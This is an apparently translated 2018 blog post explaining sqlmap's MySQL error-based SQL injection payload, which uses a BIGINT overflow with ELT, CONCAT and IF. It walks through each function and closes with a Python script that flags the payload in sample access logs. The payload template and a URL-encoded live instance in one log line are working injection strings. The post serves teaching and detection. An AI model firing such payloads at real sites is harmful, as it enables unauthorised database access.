
SQLMAP Part 1

evil0x00

Published: 13 Sept 2018 › Updated: 13 Sept 2018

Here is a flowchart put together by a more experienced researcher (figure from the original post):

Hmm... this post covers only one injection technique that I used: error-based injection.

Error-based injection is also called DOUBLE QUERY INJECTION, i.e. double-query injection.

Error-based tests - WHERE or HAVING clause

The payload is as follows:

AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))

where the subquery

SELECT (ELT([RANDNUM]=[RANDNUM],1))

returns NULL, as in:

SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x')

The ELT() function is used as follows; this figure (from the original post) explains it well:

The CONCAT() function, for example:

mysql> SELECT CONCAT('My', 'S', 'QL');

-> 'MySQL'

The IF() function is used like this:

IF(expr1, expr2, expr3)
If expr1 is TRUE, IF() returns expr2; otherwise it returns expr3.

As for why it throws an error, just run the following command in MySQL and you will understand:

select 3 * 8446744073709551610;

mysql> select 3 * 8446744073709551610;
ERROR 1690 (22003): BIGINT value is out of range in '(3 * 8446744073709551610)'
mysql>
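From a defender's side, the payload above has a stable shape: the constant 8446744073709551610 next to ELT(), CONCAT() and IF(). The following is an added example, not code from the original post or from sqlmap, that flags such BIGINT-overflow probes in constructed access-log lines and reports the response status, so a 500 on a flagged request can be reviewed as possible error disclosure.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (simplified common log format).
# The second line carries the payload discussed above with RANDNUM=1 and 'q'
# as a constructed delimiter in place of [DELIMITER_START]/[DELIMITER_STOP].
SAMPLE_LOG = """\
10.0.0.5 - - [13/Sep/2018:10:00:01 +0000] "GET /item.php?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [13/Sep/2018:10:00:02 +0000] "GET /item.php?id=1%20AND%20(SELECT%202*(IF((SELECT%20*%20FROM%20(SELECT%20CONCAT('q',(SELECT%20(ELT(1=1,1))),'q','x'))s),%208446744073709551610,%208446744073709551610))) HTTP/1.1" 500 133
10.0.0.9 - - [13/Sep/2018:10:00:03 +0000] "GET /item.php?id=2 HTTP/1.1" 200 498
"""

# Building blocks of the BIGINT-overflow error-based payload.
BIGINT_OVERFLOW_CONST = "8446744073709551610"
FUNCS = ("ELT(", "CONCAT(", "IF(")

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def is_bigint_overflow_probe(decoded_query: str) -> bool:
    """True when the URL-decoded request carries the overflow signature."""
    q = decoded_query.upper()
    return BIGINT_OVERFLOW_CONST in q and all(f in q for f in FUNCS)


def scan_log(text: str):
    """Return (client ip, status, path without query) for each flagged request."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = unquote_plus(m.group("path"))
        if is_bigint_overflow_probe(decoded):
            hits.append((m.group("ip"), int(m.group("status")), decoded.split("?", 1)[0]))
    return hits


if __name__ == "__main__":
    for ip, status, path in scan_log(SAMPLE_LOG):
        print(f"error-based probe from {ip} against {path}, response {status}")
```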
